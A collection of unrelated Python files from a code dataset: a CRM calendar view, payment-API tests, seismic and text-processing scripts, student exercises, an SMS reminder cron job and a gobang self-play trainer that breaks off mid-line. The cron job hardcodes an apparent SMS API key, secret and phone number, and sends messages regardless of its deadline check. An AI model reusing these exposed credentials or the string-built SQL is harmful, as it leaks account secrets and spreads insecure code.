self.verticalHeader().hide()\n","sub_path":"mist/gui/tagbrowser.py","file_name":"tagbrowser.py","file_ext":"py","file_size_in_byte":3681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"441947532","text":"#encoding: utf-8\nfrom OpenOrange import *\nfrom ButtonObject import *\nfrom calendar import *\nfrom globals import globals\nfrom datetime import *\nfrom ActivityType import ActivityType\nfrom CRMSettings import CRMSettings\nfrom Palette import Palette\ncrmSet = CRMSettings.bring()\n\nclass Button(ButtonObject):\n\n def __init__(self, label, color,image,xb, yb, xe, ye,code,barea):\n ButtonObject.__init__(self,label, color,image,xb, yb, xe, ye,barea)\n self.Code = code\n\n def clicked(self):\n if (self.Code != 0):\n from Activity import Activity\n from ActivityWindow import ActivityWindow\n act = Activity()\n act.internalId = self.Code\n act.load()\n actwindow = ActivityWindow()\n actwindow.setRecord(act)\n actwindow.open()\n\nclass CalendarDayVisual(ButtonArea):\n\n def __init__(self,date,starthour,endhour,Persons):\n ButtonArea.__init__(self)\n self.date = date\n self.StartHour = time(starthour,0,0)\n self.EndHour = time(endhour,0,0)\n self.Persons = Persons\n\n def setActivityColor(self,acttype, actsubtype, status):\n if (status == 1): #esta hecho\n res=\"#2b547e\" #por default\n if crmSet.Color: # ActivityDoneColor\n res = crmSet.Color\n else:\n res=\"#fddaa3\" #por default\n if actsubtype:\n at = ActivityType.bring(actsubtype)\n if not at.Color: at = ActivityType.bring(acttype)\n else:\n at = ActivityType.bring(acttype)\n res=at.Color #el seleccionado\n if at.Color: res=at.Color #el seleccionado\n return res\n\n def load(self):\n bList = ButtonList()\n #widthTotal = 300\n widthTotal = 600\n height = 21\n #width = 45\n width=90\n labelyi = 1\n labelxi = 1\n labelxf = widthTotal\n labelyf = 18\n houryf = labelyf + 18\n fecha = str(self.date.day)+\" de \"+str(globals.MonthNames[self.date.month])+\" de \"+str(self.date.year)\n label = Button(fecha,Palette.CalendarLabelColor,\"\",labelxi,labelyi,labelxf,labelyf,0,self)\n label.setLabelPosition(widthTotal/2,10)\n bList.append(label)\n nrUsers = len(self.Persons)\n hourlabel = Button(\"Horas\",Palette.CalendarLabelColor,\"\",labelxi,labelyf,width,houryf,0,self)\n hourlabel.setLabelPosition(10,10)\n bList.append(hourlabel)\n topx = 1\n topy = houryf\n bottomx 
= width\n bottomy = topy + height\n for i in range(self.StartHour.hour,self.EndHour.hour+1): #marca las horas al costado\n bohour = Button(str(i)+\":00\",Palette.CalendarLabelColor,\"\",topx,topy,bottomx,bottomy,0,self)\n bohour.setLabelPosition(10,10)\n topy = bottomy\n bottomy += height\n bList.append(bohour)\n j = 1\n if (nrUsers == 1):\n widthCell = (labelxf-width) / 2\n personxf = labelxf + width\n else:\n widthCell = (labelxf-width)/nrUsers\n personxf = widthCell+width\n\n if (self.Persons[0]!=\"\"):\n sched = self.getDailyScheduler()\n\n percent = widthCell * 0.3\n posxi = width + percent\n posxf = width+widthCell - percent\n personxi = width\n\n\n\n for person in self.Persons:\n bperson = Button(person,Palette.CalendarLabelColor,\"\",personxi,labelyf,personxf,houryf,0,self)\n bList.append(bperson)\n if sched.has_key(person):\n rec =sched[person]\n for i in range(len(rec)):\n color = self.setActivityColor(rec[i][\"ActivityType\"],rec[i][\"ActivitySubType\"],rec[i][\"Status\"])\n posyi = houryf #pinto desde inicio debajo de label\n posyf = (self.EndHour.hour - self.StartHour.hour + 1) * height + houryf #pinto hasta el final\n hst = (rec[i][\"StartTime\"].hour - self.StartHour.hour) * height\n mst = (rec[i][\"StartTime\"].minute * height) / 60\n het = (rec[i][\"EndTime\"].hour - self.StartHour.hour ) * height\n met = (rec[i][\"EndTime\"].minute * height) / 60\n if ((rec[i][\"StartTime\"].hour >= self.StartHour.hour) and (rec[i][\"StartDate\"] == self.date)):\n posyi = hst + mst + houryf\n if (rec[i][\"EndTime\"].hour <= self.EndHour.hour) and (self.date == rec[i][\"EndDate\"]):\n posyf = het + met + houryf\n s=rec[i][\"StartTime\"]\n e=rec[i][\"EndTime\"]\n sTime=timedelta(hours=s.hour,minutes=s.minute,seconds=s.second)\n eTime=timedelta(hours=e.hour,minutes=e.minute,seconds=e.second)\n dif=abs(eTime - sTime)\n if (dif.seconds < 600):\n actividad =Button(\"\",color,\"\",posxi,posyi,posxi+10,posyi+5,rec[i][\"internalId\"],self)\n actividad.hint = rec[i][\"Comment\"] + '\\n' + rec[i][\"Detail\"]\n else:\n actividad = Button(rec[i][\"Comment\"],color,\"\",posxi,posyi,posxf,posyf,rec[i][\"internalId\"],self)\n actividad.hint = rec[i][\"Comment\"] + '\\n' + rec[i][\"Detail\"]\n actividad.setLabelPosition(5,20)\n actividad.setBorder(\"#ffffff\",1)\n bList.append(actividad)\n\n posxi = (widthCell * j ) + percent+width\n personxi = widthCell * j + width\n j += 1\n posxf = (widthCell * j ) - percent + width\n personxf = widthCell * j + width\n\n dif = self.EndHour.hour - self.StartHour.hour +1\n self.setTotalSize(labelxf,( dif * height ) + houryf )\n self.setStructure(bList)\n self.setBackGroundColor(Palette.CalendarBackColor)\n\n lines={}\n lines[\"counth\"] = dif\n lines[\"countv\"] = j-1\n lines[\"xi\"] = width\n lines[\"xf\"] = labelxf\n lines[\"yi\"] = houryf\n lines[\"yf\"] = (self.EndHour.hour - self.StartHour.hour + 1) * height + houryf\n lines[\"width\"] = widthCell\n lines[\"height\"] = height\n return lines\n\n def getDailyScheduler(self):\n query = Query()\n query.sql = \"SELECT Status, internalId, ActivityType, ActivitySubType, Users, \\n\"\n query.sql += \"StartTime, EndTime, StartDate, EndDate, Comment, Detail \\n\"\n query.sql += \"FROM [Activity] \\n\"\n query.sql += \"WHERE?AND ([Activity].{StartDate} <= d|%s| and [Activity].{EndDate} >= d|%s|) \\n\" % (self.date,self.date)\n query.sql += \"WHERE?AND ([Activity].{Type} = 0)\\n\" #muestra solo las actividades\n ufilters = []\n for user in self.Persons:\n ufilters.append(\"(%s) \\n\" 
%(makeSetFieldFilter(\"Activity\",\"Users\",user)))\n query.sql += \"AND (%s) \\n\" %(\" OR \".join(ufilters))\n query.sql += \"AND (%s) \\n\" %(\" OR \".join(ufilters))\n query.sql += \"AND (([Activity].Private IS NULL or [Activity].Private = 0) OR (%s))\" % makeSetFieldFilter(\"Activity\",\"Users\",currentUser())\n \n sched = {}\n if query.open():\n for act in query:\n actusers = map(lambda x: x.strip(),act.Users.split(','))\n for person in self.Persons:\n if person in actusers:\n if not sched.has_key(person): sched[person] = []\n actdict = {\"Comment\": act.Comment, \"StartTime\": act.StartTime, \"EndTime\":act.EndTime,\"ActivityType\":act.ActivityType,\"ActivitySubType\":act.ActivitySubType, \"internalId\":act.internalId,\"Status\":act.Status, \"StartDate\":act.StartDate, \"EndDate\":act.EndDate, \"Detail\": act.Detail.decode(\"latin1\")}\n sched[person].append(actdict)\n query.close\n return sched\n\n\n","sub_path":"standard/tools/CalendarDayVisual.py","file_name":"CalendarDayVisual.py","file_ext":"py","file_size_in_byte":8032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"316243996","text":"import unittest\nimport time\n\nfrom tests.lib.client import get_client\n\n\nclass TestGpaOrdersCreate(unittest.TestCase):\n \"\"\"Tests for the gpa_orders.create endpoint.\"\"\"\n\n def setUp(self):\n \"\"\"Setup each test.\"\"\"\n\n self.client = get_client()\n\n def get_user_payment_card_request(self, user_token):\n \"\"\"Returns a payment card request for a user.\"\"\"\n\n return {\n \"user_token\": user_token,\n \"account_number\": \"4112344112344113\",\n \"cvv_number\": \"123\",\n \"exp_date\": \"0323\",\n \"zip\": \"94612\"\n }\n\n def get_user_card_holder_address_request(self, user_token):\n \"\"\"Returns a payment card address request for a user.\"\"\"\n\n return {\n \"user_token\": user_token,\n \"first_name\": \"Marqeta\",\n \"last_name\": \"QE\",\n \"address_1\": \"180 Grand Ave.\",\n \"city\": \"Oakland\",\n \"state\": \"CA\",\n \"zip\": \"94612\",\n \"country\": \"USA\"\n }\n\n def get_user_ach_request(self, user_token):\n \"\"\"Returns a ach funding sourde request for a user.\"\"\"\n\n # Routing number is for Wells Fargo, CA checking accounts\n return {\n \"user_token\": user_token,\n \"account_number\": \"12345678901234567\",\n \"routing_number\": \"121042882\",\n \"name_on_account\": \"Marqeta QE\",\n \"account_type\": \"checking\"\n }\n\n def get_program_name(self):\n \"\"\"Returns a unique program name.\"\"\"\n return \"qe_program_\" + str(int(time.time() % 1000000000))\n\n def verify_gpa_order(self, response, verify):\n \"\"\"\n\n Verifies a GPA order matches the expected values.\n\n Parameters:\n response (GpaResponse): The GPA order to verify.\n\n verify (Dictionary): The values that should be in the response.\n\n \"\"\"\n\n # Verify the expected attributes are defined\n expected_attributes = ['token', 'amount', 'created_time', 'last_modified_time', 'transaction_token', 'state',\n 'response', 'funding', 'funding_source_token', 'currency_code']\n\n for attribute in expected_attributes:\n with self.subTest(f'{attribute} is not defined'):\n self.assertIsNotNone(getattr(response, attribute))\n\n # Verify values match expected values\n match_attributes = list(verify.keys())\n\n for attribute in match_attributes:\n with self.subTest(f'{attribute} does not match the expected value'):\n self.assertEqual(getattr(response, attribute),\n verify[attribute])\n\n def verify_gpa_order_program(self, response, verify):\n \"\"\"\n\n 
Verifies a GPA order for a program funding source matches the expected values.\n\n Parameters:\n response (GpaResponse): The GPA order to verify.\n\n verify (Dictionary): The values that should be in the response.\n\n \"\"\"\n\n # Verify the expected attributes are defined\n expected_attributes = ['token', 'amount', 'created_time', 'last_modified_time', 'transaction_token', 'state',\n 'response', 'funding', 'funding_source_token', 'currency_code']\n\n for attribute in expected_attributes:\n with self.subTest(f'{attribute} is not defined'):\n self.assertIsNotNone(getattr(response, attribute))\n\n # Verify values match expected values\n match_attributes = list(verify.keys())\n\n for attribute in match_attributes:\n # funding_source_token is masked for program funding sources\n if attribute == 'funding_source_token':\n continue\n with self.subTest(f'{attribute} does not match the expected value'):\n self.assertEqual(getattr(response, attribute),\n verify[attribute])\n\n def test_gpa_orders_create_payment_card_user(self):\n \"\"\"Creates a gpa order funded by a user payment card.\"\"\"\n\n user = self.client.users.create({})\n\n card_request = self.get_user_payment_card_request(user.token)\n\n payment_card = self.client.funding_sources.payment_card.create(\n card_request)\n\n address_request = self.get_user_card_holder_address_request(user.token)\n\n address = self.client.funding_sources.addresses.create(address_request)\n\n gpa_request = {\n \"user_token\": user.token,\n \"amount\": 100.00,\n \"currency_code\": \"USD\",\n \"funding_source_token\": payment_card.token,\n \"funding_source_address_token\": address.token\n }\n\n order = self.client.gpa_orders.create(gpa_request)\n\n self.verify_gpa_order(order, gpa_request)\n\n def test_gpa_orders_create_ach_user(self):\n \"\"\"Creates a gpa order funded by a user ach.\"\"\"\n\n user = self.client.users.create({})\n\n ach_request = self.get_user_ach_request(user.token)\n\n ach_source = self.client.funding_sources.ach.create(ach_request)\n\n amounts = self.client.funding_sources.ach(\n ach_source.token).verification_amounts()\n\n ach_verification = {\n \"verify_amount1\": amounts.verify_amount1,\n \"verify_amount2\": amounts.verify_amount2\n }\n\n self.client.funding_sources.ach.save(\n ach_source.token, ach_verification)\n\n gpa_request = {\n \"user_token\": user.token,\n \"amount\": 100.00,\n \"currency_code\": \"USD\",\n \"funding_source_token\": ach_source.token\n }\n\n order = self.client.gpa_orders.create(gpa_request)\n\n self.verify_gpa_order(order, gpa_request)\n\n def test_gpa_orders_create_program_user(self):\n \"\"\"Creates a gpa order funded by a program.\"\"\"\n\n user = self.client.users.create({})\n\n program_funding_source_request = {\n \"name\": self.get_program_name()\n }\n\n program = self.client.funding_sources.program.create(\n program_funding_source_request)\n\n gpa_request = {\n \"user_token\": user.token,\n \"amount\": 100.00,\n \"currency_code\": \"USD\",\n \"funding_source_token\": program.token\n }\n\n order = self.client.gpa_orders.create(gpa_request)\n\n self.verify_gpa_order_program(order, gpa_request)\n","sub_path":"tests/gpa_orders/test_gpa_orders_create.py","file_name":"test_gpa_orders_create.py","file_ext":"py","file_size_in_byte":6344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"60772311","text":"#!/usr/bin/env python\n__author__ = 'toopazo'\n\nimport argparse\nimport os\nfrom obspy.core import read\nfrom obspy.core import Trace, Stream\n# from obspy.core 
import Trace, Stream, UTCDateTime\n# import numpy as np\n# import dateutil.parser\n# from datetime import datetime, timedelta\n\n\ndef collect_traces(infile1,\n infile2,\n infile3,\n outfile):\n\n # 1) Make sure user inputs are correct (Convert to real -no symlink- and full path)\n file = infile1\n file = os.path.normcase(file)\n file = os.path.normpath(file)\n file = os.path.realpath(file)\n infile1 = file\n print(infile1)\n\n file = infile2\n file = os.path.normcase(file)\n file = os.path.normpath(file)\n file = os.path.realpath(file)\n infile2 = file\n print(infile2)\n\n file = infile3\n file = os.path.normcase(file)\n file = os.path.normpath(file)\n file = os.path.realpath(file)\n infile3 = file\n print(infile3)\n\n # 2) Get traces\n st = read(infile1)\n tr1 = st[0]\n st = read(infile2)\n tr2 = st[0]\n st = read(infile3)\n tr3 = st[0]\n\n # 3) Collect traces\n st = Stream([tr1, tr2, tr3])\n\n # >> Write to disk\n # print(tuple_header_starttime)\n outfile_name = outfile\n st.write(outfile_name, format='MSEED', encoding=11, reclen=256, byteorder='>')\n # st.write(outfile_name, format='MSEED', encoding=0, reclen=256)\n st = read(outfile_name)\n arg = \"[tuple2mseed] MSEED created: %s\" % st[0]\n print(arg)\n # print(st1[0])\n # print(st1[0].stats)\n # print(st1[0].data)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Plot given file(s) (obspy wrapper)')\n parser.add_argument('--infile1', action='store', help='files to process', required=True)\n parser.add_argument('--infile2', action='store', help='files to process', required=True)\n parser.add_argument('--infile3', action='store', help='files to process', required=True)\n parser.add_argument('--outfile', action='store', help='files to process', required=True)\n # parser.add_argument('--ch1', action='store', help='channel signal', required=True)\n # parser.add_argument('--ch2', action='store', help='channel signal', required=True)\n # parser.add_argument('--ch3', action='store', help='channel signal', required=True)\n # parser.add_argument('--ch4', action='store', help='channel signal', required=True)\n args = parser.parse_args()\n\n collect_traces(infile1=args.infile1,\n infile2=args.infile2,\n infile3=args.infile3,\n outfile=args.outfile)\n","sub_path":"ss_collectTraces.py","file_name":"ss_collectTraces.py","file_ext":"py","file_size_in_byte":2602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"402072412","text":"from collections import defaultdict\n\n\ndef read_mecab_file():\n result = []\n with open('neko.txt.mecab', 'r') as f:\n line = f.readline()\n while len(line) > 0:\n # ref. 
http://taku910.github.io/mecab/#parse\n            surface, other = line.split('\\t')\n            other_list = other.split(',')\n            result_dict = {\n                'surface': surface,\n                'base': other_list[6],\n                'pos': other_list[0],\n                'pos1': other_list[1]\n            }\n            result.append(result_dict)\n\n            line = f.readline()\n            if 'EOS' in line:\n                break\n    return result\n\n\ndef main():\n    result = read_mecab_file()\n    bag_of_words = defaultdict(int)\n    for row in result:\n        bag_of_words[row['surface']] += 1\n    for k, v in sorted(bag_of_words.items(), key=lambda x: x[1], reverse=True):\n        print(f'word : {k} / count: {v}')\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"chapter_4/36.py","file_name":"36.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"300457952","text":"# String\nss = 'Python is the best'\nprint(ss[1:3])\nprint(len(ss))\n\n\n# Printing String in reverse\n# print the string backwards\ninStr = input('Enter a String: ')\nlength = len(inStr)\noutStr = ''\n\nfor i in range(0, length):\n    outStr += inStr[length-i-1] # indices start at 0, hence the -1\nprint(outStr)\n\n","sub_path":"python_study/ch08string/ch08_string.py","file_name":"ch08_string.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"491303765","text":"##############################################################################\n# Assignment: Homework #04 (Exercise 2)\n# Class Section: Wednesday, 6:30, ARMS 1010\n# Description: This program accepts and validates two integer values and determines\n# which is the greater of the two\n# Programmers: Oluwatosin Ogunjobi oogunjob@purdue.edu\n#############################################################################\n\n# this function determines which is the greater integer passed to it between two numbers\n# this function returns either x or y depending on which of the two was the greatest\ndef maxInteger(x, y):\n    if(x > y):\n        return x\n    else:\n        return y\n\n# this function accepts two numbers and validates if they are integers to be sent to maxInteger\n# this is a void function that returns no value\ndef main():\n    firstInteger = float(input(\"Enter the first integer: \")) # first number given\n    secondInteger = float(input(\"Enter the second integer: \")) # second number given\n    \n    if(not(firstInteger.is_integer())): # determines whether the first value is an integer\n        print(\"{0} is not an integer.\".format(firstInteger))\n    \n    elif(not(secondInteger.is_integer())): # determines whether the second value is an integer\n        print(\"{0} is not an integer.\".format(secondInteger))\n    \n    if(firstInteger.is_integer() and secondInteger.is_integer()): # if both are valid integers, finds the greater of the two\n        greaterInteger = maxInteger(firstInteger, secondInteger)\n        print(\"%d is greater.\" % (greaterInteger)) # prints the greater integer\n    \nmain()\n","sub_path":"week4/hw04_2.py","file_name":"hw04_2.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"321461227","text":"def remove_duplicates_in_array(array):\n    unique_elem = set()\n    for elem in array:\n        if elem not in unique_elem:\n            yield elem\n            unique_elem.add(elem)\n\n\ndef select_place_from_top_list(top_list, prize):\n    for index, elem in enumerate(top_list, 1):\n        if prize >= elem:\n            return index\n        elif index == len(top_list):\n            return index + 1\n\n\ndef get_history_successes(top_list, successes_data_team):\n    
history_successes = []\n sum_prev_results = 0\n top_list = list(remove_duplicates_in_array(top_list))\n for prize in successes_data_team:\n sum_prev_results += prize\n place = select_place_from_top_list(top_list, sum_prev_results)\n history_successes.append(place)\n\n return history_successes\n","sub_path":"task2.py","file_name":"task2.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"253727092","text":"from DeadlineReminderApp.models import Deadline\nfrom jdatetime import datetime\nimport persian, requests, json\n\n\ndef job():\n current_time = datetime.now()\n for deadline in Deadline.objects.all():\n x = deadline.due_date\n difference = (datetime(x.year, x.month, x.day) - current_time)\n if difference.days < deadline.send_message_before_days:\n pass\n send_SMS(\"YAY\", \"09172147407\")\n\n\ndef send_SMS(text, number):\n sms_key = \"97730a8df134abeebf810a8d\"\n sms_secret_key = \"ehsan_karimi_hamiss\"\n sms_number = \"50002015806469\"\n url = 'http://RestfulSms.com/api/Token'\n data = {\n 'UserApiKey': sms_key,\n 'SecretKey': sms_secret_key\n }\n resp = requests.post(url, data)\n content = resp.content\n\n js = json.loads(content.decode(\"utf8\"))\n\n print(js)\n token = js['TokenKey']\n\n header = {\n 'x-sms-ir-secure-token': token\n }\n\n dic = {\n 'Messages': [text],\n 'MobileNumbers': [number],\n 'LineNumber': sms_number,\n 'SendDateTime': '',\n 'CanContinueInCaseOfError': 'false'\n }\n url = 'http://RestfulSms.com/api/MessageSend'\n print(dic, header)\n result = requests.post(url, dic, headers=header)\n print(result.content)\n","sub_path":"DeadlineReminderApp/cron.py","file_name":"cron.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"552459089","text":"import os\nimport json\nimport logging.config\n\n\ndef configure_logging(configure_file_path=\"LogConfigure.json\", default_level=logging.INFO, env_key=\"LOG_CFG\"):\n path = configure_file_path\n value = os.getenv(env_key, None)\n if value:\n path = value\n if os.path.exists(path):\n print(\"logging_config.json path exit\")\n with open(path, \"r\") as f:\n config = json.load(f)\n logging.config.dictConfig(config)\n else:\n print(\"logging_config.json path not exit\")\n logging.basicConfig(level=default_level)\n\n\ndef set_log_info():\n logging.info(\"Let's start to log some information.\")\n\n logging.error(\"There are so many errors.\")\n logging.info(\"go\")\n\n\nif __name__ == \"__main__\":\n configure_logging(\"logging_config.json\")\n set_log_info()","sub_path":"text_matching/souhu/roberta_wwm_base/loadlog.py","file_name":"loadlog.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"86951628","text":"import matplotlib.pyplot as plt\nimport matplotlib as mpl\nimport numpy as np\nfrom mpl_toolkits.basemap import Basemap\nimport pandas as pd\nfrom matplotlib.patches import Polygon\nfrom matplotlib.collections import PatchCollection\nfrom matplotlib.patches import PathPatch\n\n#PUMA,ST: state,NRC: Number of children,NPF: number of people,ACCESS: access to Internet (3: No)\ndata = pd.read_csv(\"/home/krishna/Documents/My_Docs/PBL/data/pums/hou_chil_without_null.csv\")\n\ndata=data.dropna(axis=0)\n\n#number of children without Net in each 
PUMA\nnoNet=data[data['ACCESS']==3].set_index(['ST','PUMA']).NRC\nnoNet=noNet.reset_index().groupby(['ST','PUMA']).sum().reset_index()\n\n#total number of children in each PUMA\ntotalNum=data.groupby(['ST','PUMA']).NRC.sum().reset_index()\n\n#percentage of children without Internet access in each PUMA\nnoNet['perc']=noNet['NRC']/totalNum['NRC']*100\nnoNet=noNet.groupby(['ST', 'PUMA'])['perc'].sum().reset_index()\n\n#plotting\nstate_codes = {'01': 'Alabama', \n '04': 'Arizona', \n '05': 'Arkansas', \n '06': 'California', \n '08': 'Colorado', \n '09': 'Connecticut', \n '10': 'Delaware', \n '11': 'District of Columbia', \n '12': 'Florida', \n '13': 'Georgia', \n '15': 'Hawaii', \n '16': 'Idaho', \n '17': 'Illinois', \n '18': 'Indiana', \n '19': 'Iowa',\n '20': 'Kansas', \n '21': 'Kentucky', \n '22': 'Louisiana', \n '23': 'Maine', \n '24': 'Maryland', \n '25': 'Massachusetts', \n '26': 'Michigan', \n '27': 'Minnesota', \n '28': 'Mississippi', \n '29': 'Missouri', \n '30': 'Montana', \n '31': 'Nebraska', \n '32': 'Nevada', \n '33': 'New Hampshire', \n '34': 'New Jersey', \n '35': 'New Mexico', \n '36': 'New York', \n '37': 'North Carolina', \n '38': 'North Dakota', \n '39': 'Ohio', \n '40': 'Oklahoma', \n '41': 'Oregon', \n '42': 'Pennsylvania', \n '44': 'Rhode Island', \n '45': 'South Carolina', \n '46': 'South Dakota', \n '47': 'Tennessee', \n '48': 'Texas', \n '49': 'Utah', \n '50': 'Vermont', \n '51': 'Virginia', \n '53': 'Washington', \n '54': 'West Virginia', \n '55': 'Wisconsin', \n '56': 'Wyoming', \n } \n\n\nnum=10\ncm=plt.get_cmap('hot')\nreds=[cm(1.0*i/num) for i in range(num-1,-1,-1)]\ncmap = mpl.colors.ListedColormap(reds)\n\nfig = plt.figure(figsize=(10,5))\nax = fig.add_subplot(111, axisbg='w', frame_on=False)\nfig.suptitle('Percentage of children without Internet access', fontsize=20)\n\nm = Basemap(width=5000000,height=3500000,resolution='l',projection='aea',lat_1=30.,lat_2=50,lon_0=-96,lat_0=38)\n\nfor key in state_codes.keys():\n m.readshapefile('/home/krishna/Documents/My_Docs/PBL/data/shapefiles/pums/tl_2013_{0}_puma10'.format(key), name='state', drawbounds=True)\n new_key = int(key)\n \n for info, shape in zip(m.state_info, m.state):\n id=int(info['PUMACE10'])\n value=noNet[(noNet['ST']==new_key) & (noNet['PUMA']==id)]['perc']\n color=int(value/10)\n patches = [Polygon(np.array(shape), True)]\n pc = PatchCollection(patches, edgecolor='k', linewidths=1., zorder=2)\n pc.set_color(reds[color])\n ax.add_collection(pc)\n\nax2 = fig.add_axes([0.82, 0.1, 0.03, 0.8])\nbounds=np.linspace(0,10,num)\ncb = mpl.colorbar.ColorbarBase(ax2, cmap=cmap, ticks=bounds, boundaries=bounds)\ncb.ax.set_yticklabels([str(round(i)*10) for i in bounds])\n\n#save the figure before show(), otherwise an empty canvas is written to disk\nplt.savefig(\"children_without_internet_access.png\")\nplt.show()\n","sub_path":"child_no_int_acc_.py","file_name":"child_no_int_acc_.py","file_ext":"py","file_size_in_byte":5253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"132433473","text":"from collections import deque\nfrom Arena import Arena\nfrom MCTS import MCTS\nimport numpy as np\nfrom pytorch_classification.utils import Bar, AverageMeter\nimport time, os\nfrom pickle import Pickler, Unpickler\nimport tensorflow as tf\nimport multiprocessing\nfrom gobang.tensorflow.NNet import NNetWrapper as nn\nfrom gobang.GobangGame import display\nfrom gobang.GobangPlayers import *\nimport logging as log\nfrom utils import *\n\n# python logging doesn't work with tf-1.14\nclass MyLogger:\n filename = \"capabilities.log\"\n \n def log(msg):\n with 
open(MyLogger.filename, \"a\") as myfile:\n myfile.write(msg+\"\\n\")\n def info(msg):\n MyLogger.log(\"INFO:\"+msg)\n def warning(msg):\n MyLogger.log(\"WARNING:\"+msg)\n def error(msg):\n MyLogger.log(\"ERROR:\"+msg)\n \n\ndef AsyncSelfPlay(game,args,iter_num,bar):\n #set gpu\n gpus = args.setGPU.split(',')\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = gpus[iter_num%len(gpus)]\n\n #set gpu memory grow\n config = tf.ConfigProto()\n config.gpu_options.allow_growth=True\n sess = tf.Session(config=config)\n\n #create nn and load weights\n net = nn(game, args.displaybar)\n try:\n net.load_checkpoint(folder=args.checkpoint, filename='best.pth.tar')\n except:\n print(\"No best model found\")\n mcts = MCTS(game, net, args, args.lambdaHeur)\n\n # create a separate seed for each worker\n np.random.seed(iter_num)\n \n # create a list to store the game states\n returnlist = []\n for i in range(args.numPerProcessSelfPlay):\n # Each process plays many games, so the NN does not have to be re-initialized every time a game starts.\n\n if args.displaybar:\n bar.suffix = \"iter:{i}/{x} | Total: {total:} | ETA: {eta:}\".format(\n i=i+1,x=args.numPerProcessSelfPlay,total=bar.elapsed_td, eta=bar.eta_td)\n bar.next()\n\n trainExamples = []\n board = game.getInitBoard()\n curPlayer = 1\n episodeStep = 0\n\n boardSize = np.product(np.shape(board))\n while True:\n templist = []\n episodeStep += 1\n temp = 1 if episodeStep < args.tempThreshold else episodeStep - args.tempThreshold\n\n pi, counts = mcts.getActionProb(board, curPlayer=curPlayer, temp=temp, debug=True)\n action = np.random.choice(len(pi), p=pi)\n mtx = mcts.heuristic.get_field_stregth_mtx(board, 1)\n heuristic_components = mcts.heuristic.get_x_line_mtx(board, 1)\n shape = list(board.shape)+[1]\n trainExamples.append([np.concatenate([np.reshape(board,shape),\n np.reshape(mtx, shape),\n heuristic_components], axis=2),\n curPlayer, pi, None])\n \n board, curPlayer = game.getNextState(board, curPlayer, action)\n\n r = game.getGameEnded(board, curPlayer, action)\n if r!=0: # game is over\n # scale the reward down the longer the game took\n reward0 = r*(float(boardSize-episodeStep+1)/(boardSize))\n #reward0=r*(1/episodeStep)\n mylist = []\n # === Log info ===\n if False:\n print(\"\\n\",r, curPlayer, \"\\n\")\n display(board, end = True)\n np.set_printoptions(precision=5)\n print(np.resize(pi[:-1],board.shape()).transpose())\n print(\"\")\n\n for i,x in enumerate(reversed(trainExamples[args.learnFromEnd:])):\n reward = (args.coeff**(i//2))*reward0*((-1)**(x[1]!=curPlayer))\n mylist.append((x[0], x[1], x[2], reward))\n templist.append(list(mylist))\n returnlist.append(templist)\n break\n\n return returnlist\n\ndef AsyncTrainNetwork(game,args,trainhistory):\n #set gpu\n gpus = args.setGPU.split(',')\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = gpus[0]\n #create network for training\n nnet = nn(game, args.displaybar)\n try:\n nnet.load_checkpoint(folder=args.checkpoint, filename='best.pth.tar')\n #print(\"Retrain best model\")\n except:\n pass\n #---load history file---\n modelFile = os.path.join(args.checkpoint, \"trainhistory.pth.tar\")\n examplesFile = modelFile+\".examples\"\n if not os.path.isfile(examplesFile):\n print(examplesFile)\n else:\n print(\"File with trainExamples found. 
Read it.\")\n with open(examplesFile, \"rb\") as f:\n for i in Unpickler(f).load():\n trainhistory.append(i)\n f.closed\n #----------------------\n #---delete if over limit---\n if len(trainhistory) > args.numItersForTrainExamplesHistory:\n print(\"len(trainExamplesHistory) =\", len(trainhistory), \" => remove the oldest trainExamples\")\n del trainhistory[len(trainhistory)-1]\n #-------------------\n #---extend history---\n trainExamples = []\n for e in trainhistory:\n trainExamples.extend(np.array(e))\n\n #for e in trainhistory[:10]:\n # print(e)\n #---save history---\n folder = args.checkpoint\n if not os.path.exists(folder):\n os.makedirs(folder)\n filename = os.path.join(folder, 'trainhistory.pth.tar'+\".examples\")\n with open(filename, \"wb+\") as f:\n Pickler(f).dump(trainhistory)\n f.closed\n #------------------\n nnet.train(trainExamples)\n nnet.save_checkpoint(folder=args.checkpoint, filename='train.pth.tar')\n\n #print(trainExamples[0][0].transpose(), trainExamples[0][2])\n print(len(trainExamples))\n \ndef AsyncAgainst(game,args,iter_num,bar):\n # create separate seeds for each worker\n np.random.seed(iter_num)\n\n if args.displaybar:\n bar.suffix = \"iter:{i}/{x} | Total: {total:} | ETA: {eta:}\".format(\n i=iter_num+1,x=args.numAgainstPlayProcess,total=bar.elapsed_td, eta=bar.eta_td)\n bar.next()\n\n #set gpu\n gpus = args.setGPU.split(',')\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = gpus[iter_num%len(gpus)]\n\n #set gpu memory grow\n config = tf.ConfigProto()\n config.gpu_options.allow_growth=True \n sess = tf.Session(config=config)\n \n #create nn and load\n nnet = nn(game, args.displaybar)\n pnet = nn(game, args.displaybar)\n try:\n nnet.load_checkpoint(folder=args.checkpoint, filename='train.pth.tar')\n except:\n print(\"load train model fail\")\n pass\n try:\n pnet.load_checkpoint(folder=args.checkpoint, filename='best.pth.tar')\n except:\n print(\"load old model fail\")\n filepath = 